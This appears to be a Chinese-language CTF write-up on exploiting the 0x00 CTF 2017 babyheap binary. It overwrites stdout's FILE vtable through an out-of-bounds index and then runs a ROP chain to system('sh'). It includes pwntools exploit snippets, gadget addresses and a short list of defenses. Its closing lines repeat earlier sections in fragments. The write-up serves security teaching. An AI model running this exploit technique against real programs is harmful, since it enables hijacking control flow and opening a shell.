利用File结构体vtable进行ROP攻击的技术分析<\/h1>

漏洞背景<\/h2>
本文以0x00 CTF 2017的babyheap题目为例，详细讲解如何通过修改vtable进行ROP攻击的技术。该技术利用了程序中的越界读写漏洞，通过篡改IO_FILE结构体的虚表指针，最终实现控制流劫持。<\/p>

程序分析<\/h2>

安全措施检查<\/h3>

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE
<\/code><\/pre>
关键点：没有开启PIE，意味着代码段的地址固定，便于利用。<\/p>
程序功能<\/h3>

初始化功能<\/strong>：程序开始时要求用户往bss段的name缓冲区输入内容<\/li>
add函数<\/strong>：分配指定大小的内存并读入username<\/li>
edit函数<\/strong>：根据输入的index写入内容（无边界检查）<\/li>
ban函数<\/strong>：释放user对象<\/li>
changename函数<\/strong>：修改bss段的name<\/li>
特殊功能<\/strong>：选项5会打印read函数的地址，可泄露libc基址<\/li>
<\/ol>
关键漏洞<\/h3>
edit函数存在越界读漏洞：<\/p>

直接使用用户输入的数字作为数组索引<\/li>
可以从users数组外读取数据作为指针<\/li>
结合可控的name缓冲区，可实现任意地址写<\/li>
<\/ul>
BSS段布局<\/h3>
users数组起始地址: 0x0602040
name缓冲区地址: 0x006020a0
<\/code><\/pre>
计算偏移：(0x006020a0-0x00602040)\/8 = 12，意味着索引12会从name缓冲区开始处取8字节作为指针。<\/p>
漏洞利用<\/h2>
利用思路<\/h3>

通过选项5泄露libc地址<\/li>
利用edit和changename实现任意地址写<\/li>
题目使用libc 2.23（无虚表保护）<\/li>
选择修改stdout的虚表指针，伪造stdout的虚表<\/li>
在调用虚表时控制RIP<\/li>
<\/ol>
技术细节<\/h3>


stdout结构分析<\/strong>：<\/p>

stdout是_IO_FILE_plus<\/code>类型，大小0xe0<\/li>
最后8字节是vtable指针(stdout+0xd8处)<\/li>
vtable类型是struct _IO_jump_t<\/code>，大小0xa8<\/li>
<\/ul>
<\/li>

伪造虚表限制<\/strong>：<\/p>

name缓冲区大小仅0x28，无法伪造整个虚表<\/li>
只需修改虚表中接下来会被调用的项的指针<\/li>
<\/ul>
<\/li>
<\/ol>
利用步骤<\/h3>

泄露libc基址<\/strong>：<\/li>
<\/ol>
choice(5<\/span>)
<\/span><\/span>p.<\/span>recvuntil("your gift:<\/span>\n<\/span>"<\/span>)
<\/span><\/span>libc.<\/span>address =<\/span> int(p.<\/span>recvline().<\/span>strip()) -<\/span> libc.<\/span>symbols['read'<\/span>]
<\/span><\/span>stdout_vtable_addr =<\/span> libc.<\/span>symbols['_IO_2_1_stdout_'<\/span>] +<\/span> 0xd8<\/span>
<\/span><\/span><\/code><\/pre>
布置name缓冲区<\/strong>：<\/li>
<\/ol>
choice(4<\/span>)
<\/span><\/span>payload =<\/span> ""<\/span>
<\/span><\/span>payload +=<\/span> p64(stdout_vtable_addr)  # 修改虚表指针<\/span>
<\/span><\/span>payload +=<\/span> cyclic(0x28<\/span> -<\/span> len(payload))
<\/span><\/span>p.<\/span>sendafter("enter new name:"<\/span>, payload)
<\/span><\/span><\/code><\/pre>
触发任意地址写<\/strong>：<\/li>
<\/ol>
choice(2<\/span>)
<\/span><\/span>p.<\/span>sendlineafter("2. insecure edit"<\/span>, "2"<\/span>)
<\/span><\/span>p.<\/span>sendlineafter("index: "<\/span>, '12'<\/span>)  # 从name缓冲区开始处取8字节作为指针<\/span>
<\/span><\/span>payload =<\/span> p64(bss_name)  # 修改vtable的值<\/span>
<\/span><\/span>p.<\/span>sendafter("new username: "<\/span>, payload[:6<\/span>])  # 只发送6字节<\/span>
<\/span><\/span><\/code><\/pre>
控制流劫持<\/strong>：<\/li>
<\/ol>

当调用虚表时，会执行call [rax + 0x38]<\/code><\/li>
通过设置$rax = bss_name - 0x18<\/code>，使$rax + 0x38<\/code>指向可控区域<\/li>
<\/ul>
ROP利用<\/h3>

gadget选择<\/strong>：

使用libc中的代码片段（位于authnone_create-0x35<\/code>处）：<\/li>
<\/ol>
mov rdi, rsp
call qword ptr [rax+20h]
...
<\/code><\/pre>

利用思路<\/strong>：<\/li>
<\/ol>

设置rax+0x20<\/code>为gets函数地址<\/li>
通过gets向栈中写入ROP链<\/li>
控制程序流进入ROP链<\/li>
<\/ul>

ROP链构造<\/strong>：<\/li>
<\/ol>
pop_rdi_ret =<\/span> 0x0000000000400f13<\/span>
<\/span><\/span>zero_addr =<\/span> 0x6020c8<\/span>  # 该位置的值为p64(0)<\/span>
<\/span><\/span>
<\/span><\/span>payload =<\/span> 'a'<\/span> *<\/span> 8<\/span>
<\/span><\/span>payload +=<\/span> p64(zero_addr -<\/span> 0x38<\/span>)
<\/span><\/span>payload +=<\/span> cyclic(40<\/span>)
<\/span><\/span>payload +=<\/span> p64(pop_rdi_ret)
<\/span><\/span>payload +=<\/span> p64(sh_addr)
<\/span><\/span>payload +=<\/span> p64(libc.<\/span>symbols['system'<\/span>])
<\/span><\/span>p.<\/span>sendline(payload)
<\/span><\/span><\/code><\/pre>技术总结<\/h2>


关键点<\/strong>：<\/p>

利用越界读实现任意地址写<\/li>
修改stdout的vtable指针<\/li>
通过控制虚表调用劫持控制流<\/li>
使用特殊gadget实现栈迁移<\/li>
<\/ul>
<\/li>

适用场景<\/strong>：<\/p>

存在任意地址写能力<\/li>
能控制rax指向的内容<\/li>
可以修改虚表指针的情况<\/li>
<\/ul>
<\/li>

防御措施<\/strong>：<\/p>

启用PIE<\/li>
对数组访问进行边界检查<\/li>
使用现代libc版本（有虚表保护）<\/li>
<\/ul>
<\/li>
<\/ol>
参考资源<\/h2>

0x00 CTF 2017 babyheap writeup<\/a><\/li>
IO_FILE结构体利用技术<\/a><\/li>
<\/ol>
通过本文的分析，我们深入了解了如何利用File结构体的vtable进行ROP攻击的技术细节，这种技术在CTF比赛和实际漏洞利用中都有重要应用价值。<\/p>

利用File结构体vtable进行ROP攻击的技术分析<\/h1>

漏洞背景<\/h2> 本文以0x00 CTF 2017的babyheap题目为例，详细讲解如何通过修改vtable进行ROP攻击的技术。该技术利用了程序中的越界读写漏洞，通过篡改IO_FILE结构体的虚表指针，最终实现控制流劫持。<\/p>

程序分析<\/h2>

漏洞利用<\/h2>

漏洞背景<\/h2>
本文以0x00 CTF 2017的babyheap题目为例，详细讲解如何通过修改vtable进行ROP攻击的技术。该技术利用了程序中的越界读写漏洞，通过篡改IO_FILE结构体的虚表指针，最终实现控制流劫持。<\/p>